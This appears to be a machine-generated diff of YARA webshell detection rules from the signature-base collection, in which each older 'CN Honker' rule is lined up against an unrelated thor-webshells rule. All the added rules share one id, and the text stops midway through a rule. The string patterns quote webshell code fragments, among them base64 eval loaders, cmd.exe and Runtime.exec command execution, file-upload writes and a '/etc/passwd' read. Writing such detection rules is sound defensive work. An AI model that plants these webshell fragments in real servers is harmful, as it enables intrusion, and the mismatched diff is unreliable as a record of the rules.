-		$varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
-		$varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
+		$s0 = "<?php eval(gzuncompress(base64_decode(\""
 
 	condition:
-		any of them
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Csharp_Hash_String_Oct22 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Zx
 {
 	meta:
-		description = "C# webshell using specific hash check for the password."
-		author = "Nils Kuhnert (modified by Florian Roth)"
-		id = "c7d459be-5e61-57b7-b738-051c0cec62d2"
-		date = "2022-10-27"
-		modified = "2023-12-05"
+		description = "Web Shell - file zx.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshell_csharp.yar#L2-L25"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1191-L1204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "29c187ad46d3059dc25d5f0958e0e8789fb2a51b9daaf90ea27f001b1a9a603c"
-		logic_hash = "28a07f3dd17fc469388867fa82a0e21abeee9c4e114af245b684535e4e194891"
-		score = 60
+		hash = "67627c264db1e54a4720bd6a64721674"
+		logic_hash = "d97df624801d0f24141dfe7074d290a56e639af7d867c907362ff4434c3eeac0"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$gen1 = "void Page_Load" ascii
-		$gen2 = "FromBase64String" ascii
-		$gen3 = "CryptoServiceProvider" ascii
-		$gen4 = "ComputeHash" ascii
-		$hashing1 = "BitConverter.ToString(" ascii
-		$hashing2 = ").Replace(\"-\", \"\") == \"" ascii
-		$filter1 = "BitConverter.ToString((" ascii
+		$s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"
 
 	condition:
-		filesize < 10KB and all of ( $gen* ) and all of ( $hashing* ) and not 1 of ( $filter* )
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php5 : FILE
+rule SIGNATURE_BASE_Webshell_Ani_Shell
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php5.txt"
+		description = "Web Shell - file Ani-Shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ee063c4c-af06-520f-acfe-fba758b84d3c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L8-L23"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1205-L1220"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0fd91b6ad400a857a6a65c8132c39e6a16712f19"
-		logic_hash = "e882f115a67fe31ece1a81e1a2770b46370a92ac3aa23e348a12cdb5735e8a0e"
+		hash = "889bfc9fbb8ee7832044fc575324d01a"
+		logic_hash = "c8caf8686c36a41b5aae093e88b8872350cf625c59a14389c5df93f284c8f05a"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user" ascii
-		$s20 = "echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump').\"<b>\".$" ascii
+		$s0 = "$Python_CODE = \"I"
+		$s6 = "$passwordPrompt = \"\\n================================================="
+		$s7 = "fputs ($sockfd ,\"\\n==============================================="
 
 	condition:
-		uint16( 0 ) == 0x3f3c and filesize < 300KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Test3693 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_K8Cmd
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file test3693.war"
+		description = "Web Shell - file k8cmd.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "58fe4445-b2e1-5d5f-8c46-39c6ae78f845"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L25-L40"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1221-L1234"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "246d629ae3ad980b5bfe7e941fe90b855155dbfc"
-		logic_hash = "a10618d54fb7adbbd89a10f2e1ac067ccd1832140bcaf3b92394ebe7323f2d1e"
+		hash = "b39544415e692a567455ff033a97a682"
+		logic_hash = "e523a5b1118c6f4d5798f130c00466c7945d27a6fbe0d4cb3a40b7f36da2a502"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Process p=Runtime.getRuntime().exec(\"cmd /c \"+strCmd);" fullword ascii
-		$s2 = "http://www.topronet.com </font>\",\" <font color=red> Thanks for your support - " ascii
+		$s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 50KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Mycode12 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Cmd
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file mycode12.cfm"
+		description = "Web Shell - file cmd.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2ce7368c-7565-5b32-94d1-c87023404c5b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L42-L57"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1236-L1249"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "64be8760be5ab5c2dcf829e3f87d3e50b1922f17"
-		logic_hash = "94cb0e414634af753db9ec0c63a3a34b4f9104e93e01d67cebab7b3a0c471198"
+		hash = "5391c4a8af1ede757ba9d28865e75853"
+		logic_hash = "e48d4e2d14a3605fd9dda03630820a0fb53d893cc4d283739fde11f9ab7d9d1e"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<cfexecute name=\"cmd.exe\"" fullword ascii
-		$s2 = "<cfoutput>#cmd#</cfoutput>" fullword ascii
+		$s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword
 
 	condition:
-		filesize < 4KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Offlibrary : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_K81
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file offlibrary.php"
+		description = "Web Shell - file k81.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c01f7c8b-a6bd-5094-9574-8cc853698607"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L59-L74"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1251-L1265"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "eb5275f99211106ae10a23b7e565d208a94c402b"
-		logic_hash = "ffec24bedfe0794e8f92da5067c41932339e61ec23d71a67ed4b634434cd10d6"
+		hash = "41efc5c71b6885add9c1d516371bd6af"
+		logic_hash = "f9c6b5bec9313c6fd059055fa18332675838419bba3348bb852b50806f26ccb2"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "';$i=$g->query(\"SELECT SUBSTRING_INDEX(CURRENT_USER, '@', 1) AS User, SUBSTRING" ascii
-		$s12 = "if(jushRoot){var script=document.createElement('script');script.src=jushRoot+'ju" ascii
+		$s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
+		$s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
 
 	condition:
-		filesize < 1005KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Cfm_Xl : FILE
+rule SIGNATURE_BASE_Webshell_ASP_Zehir
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file xl.cfm"
+		description = "Web Shell - file zehir.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5c8d1301-fe20-50e0-86ac-99a220cd4be1"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L76-L91"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1266-L1279"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "49c3d16ee970945367a7d6ae86b7ade7cb3b5447"
-		logic_hash = "b6683a24ad58a9444ec91f13e7da5db3e3e768afded09a23e1bbd0a0c23cf6b9"
+		hash = "0061d800aee63ccaf41d2d62ec15985d"
+		logic_hash = "90920258017cf189da128dce477e71f0040bc66aefa6f018f64db64d22f60ae5"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<input name=\"DESTINATION\" value=\"" ascii
-		$s1 = "<CFFILE ACTION=\"Write\" FILE=\"#Form.path#\" OUTPUT=\"#Form.cmd#\">" fullword ascii
+		$s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&"
 
 	condition:
-		uint16( 0 ) == 0x433c and filesize < 13KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Linux : FILE
+rule SIGNATURE_BASE_Webshell_Worse_Linux_Shell_1
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file linux.txt"
+		description = "Web Shell - file Worse Linux Shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d94f1c5-2139-5d0d-8af9-9c30a0359910"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L93-L108"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		old_rule_name = "webshell_Worse_Linux_Shell"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1280-L1294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "78339abb4e2bb00fe8a012a0a5b7ffce305f4e06"
-		logic_hash = "2c6278acd123e0d41ed4f0f8f0da27d5de1ad56efb8102c9eae442838a0416d0"
+		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+		logic_hash = "a24e7ae7c722da7f265f032315b1e8e402c2fc4a2a54a685671a9e52124f6553"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<form name=form1 action=exploit.php method=post>" fullword ascii
-		$s1 = "<title>Changing CHMOD Permissions Exploit " fullword ascii
+		$s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"
 
 	condition:
-		uint16( 0 ) == 0x696c and filesize < 6KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Interception3389_Get : FILE
+rule SIGNATURE_BASE_Webshell_Zacosmall
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file get.asp"
+		description = "Web Shell - file zacosmall.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b17a793f-ffb7-5cdc-ba21-b0e2f0d14490"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L110-L126"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1295-L1308"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ceb6306f6379c2c1634b5058e1894b43abcf0296"
-		logic_hash = "649e611c9d8948e60811af4209d737b3e797e6b42beba42439541ae543b062d6"
+		hash = "5295ee8dc2f5fd416be442548d68f7a6"
+		logic_hash = "739d58e3ab6712c703e0cb0e0070afec3376844b77ed081a5d12407cabb62319"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "userip = Request.ServerVariables(\"HTTP_X_FORWARDED_FOR\")" fullword ascii
-		$s1 = "file.writeline  szTime + \" HostName:\" + szhostname + \" IP:\" + userip+\":\"+n" ascii
-		$s3 = "set file=fs.OpenTextFile(server.MapPath(\"WinlogonHack.txt\"),8,True)" fullword ascii
+		$s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"
 
 	condition:
-		filesize < 3KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Nc_1 : FILE
+rule SIGNATURE_BASE_Webshell_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file 1.txt"
+		description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fe83df79-f7cb-50b8-bb34-9bfc5fbe3de2"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L128-L143"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1309-L1322"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "51d83961171db000fe4476f36d703ef3de409676"
-		logic_hash = "80ea8f16d943a3775fe9999131272af9e7f1af60d413109e58ecdef036484760"
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+		logic_hash = "9630fc0371193bfbd0bd4fb15856477e7739fc9f11ee539d119ee837b1a54502"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 " ascii
-		$s2 = "<%if session(\"pw\")<>\"go\" then %>" fullword ascii
+		$s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
 
 	condition:
-		filesize < 11KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Blacksky : FILE
+rule SIGNATURE_BASE_Webshell_Redirect
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php6.txt"
+		description = "Web Shell - file redirect.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "741bb4db-6296-5222-8480-1169a6f44fd8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L145-L160"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1323-L1336"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a60a599c6c8b6a6c0d9da93201d116af257636d7"
-		logic_hash = "3b92f63f536361d8ba0cde853fb546f271abdec3a7c1d44688a42610f5f90c57"
+		hash = "97da83c6e3efbba98df270cc70beb8f8"
+		logic_hash = "b16026623fe7802db9823ad4a3dab051747eea6bd41ce72a0c8c6757bfa2c6f7"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "eval(gzinflate(base64_decode('" ascii
-		$s1 = "B1ac7Sky-->" fullword ascii
+		$s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "
 
 	condition:
-		filesize < 641KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp3 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Cmdjsp
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file asp3.txt"
+		description = "Web Shell - file cmdjsp.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0cb01c07-b424-532d-8aef-5ec25dfe3f19"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L162-L177"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1337-L1350"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "87c5a76989bf08da5562e0b75c196dcb3087a27b"
-		logic_hash = "e5f30a445be30c491e669c633bf2df08cbfb1017ecfc91f9ed83275550488304"
+		hash = "b815611cc39f17f05a73444d699341d4"
+		logic_hash = "b4822e47a27c598be746ac71bf9b60dafe08d50c83a2dfee5e40ea384fcff21a"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if shellpath=\"\" then shellpath = \"cmd.exe\"" fullword ascii
-		$s2 = "c.open \"GET\", \"http://127.0.0.1:\" & port & \"/M_Schumacher/upadmin/s3\", Tru" ascii
+		$s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
 
 	condition:
-		filesize < 444KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Sniff : FILE
+rule SIGNATURE_BASE_Webshell_Java_Shell
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file sniff.txt"
+		description = "Web Shell - file Java Shell.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8cf47d71-1b97-5967-ad70-2ea6fad7cc29"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L179-L194"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1351-L1365"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e246256696be90189e6d50a4ebc880e6d9e28dfd"
-		logic_hash = "198442e75422055e7d65c5d1aef55819036a99077aa79dbd5006ba97c4fe4af8"
+		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+		logic_hash = "0d313ff81a36b456326df0054853c31d69710fc142fcfa65747691238af4e635"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));" fullword ascii
-		$s2 = "if (!logIt && my_s_smtp && (dport == 25 || sport == 25))" fullword ascii
+		$s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
+		$s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
 
 	condition:
-		filesize < 91KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Udf_Udf : FILE
+rule SIGNATURE_BASE_Webshell_Asp_1D
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file udf.php"
+		description = "Web Shell - file 1d.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "07252f2d-1a99-5f21-940d-899a4821b511"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L196-L211"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1366-L1379"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "df63372ccab190f2f1d852f709f6b97a8d9d22b9"
-		logic_hash = "c7db32b5e66601e0b8322ac67b6b9ba8d6222891ed01db557bfac9985140421a"
+		hash = "fad7504ca8a55d4453e552621f81563c"
+		logic_hash = "85b17fde8fb535b64e5eabc887428d9b73adc5bc6741a3a387f235a8b0c6089a"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<?php // Source  My : Meiam  " fullword ascii
-		$s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
+		$s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"
 
 	condition:
-		filesize < 430KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_JSP_Jsp : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Ixrbe
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jsp.html"
+		description = "Web Shell - file IXRbE.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "46f2fb10-2c0c-5bc2-b3bb-eba4c74bcad7"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L213-L228"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1380-L1393"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c58fed3d3d1e82e5591509b04ed09cb3675dc33a"
-		logic_hash = "089e1a553900d149a4087ac81254295d74de15d9baaf73e60ce4f061e450e8c7"
+		hash = "e26e7e0ebc6e7662e1123452a939e2cd"
+		logic_hash = "8710d092b81c5de1e328ad6e57e5c4a25748cc92844198038c103dabc1e76e77"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<input name=f size=30 value=shell.jsp>" fullword ascii
-		$s2 = "<font color=red>www.i0day.com  By:" fullword ascii
+		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
 
 	condition:
-		filesize < 3KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_T00Ls_Lpk_Sethc_V4_Mail : FILE
+rule SIGNATURE_BASE_Webshell_PHP_G5
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file mail.php"
+		description = "Web Shell - file G5.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2f7d8a4d-9d94-5f23-9768-cc3712678d93"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L230-L245"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1394-L1407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0a9b7b438591ee78ee573028cbb805a9dbb9da96"
-		logic_hash = "b835a6d0c736116e0a8b277dadbf25c2ac333b0d7937a6f67ed59887c610a57a"
+		hash = "95b4a56140a650c74ed2ec36f08d757f"
+		logic_hash = "2edffbea5142ef146cec57cb88b473532f56ab3e95151c5648eaeabe6a75feda"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if (!$this->smtp_putcmd(\"AUTH LOGIN\", base64_encode($this->user)))" fullword ascii
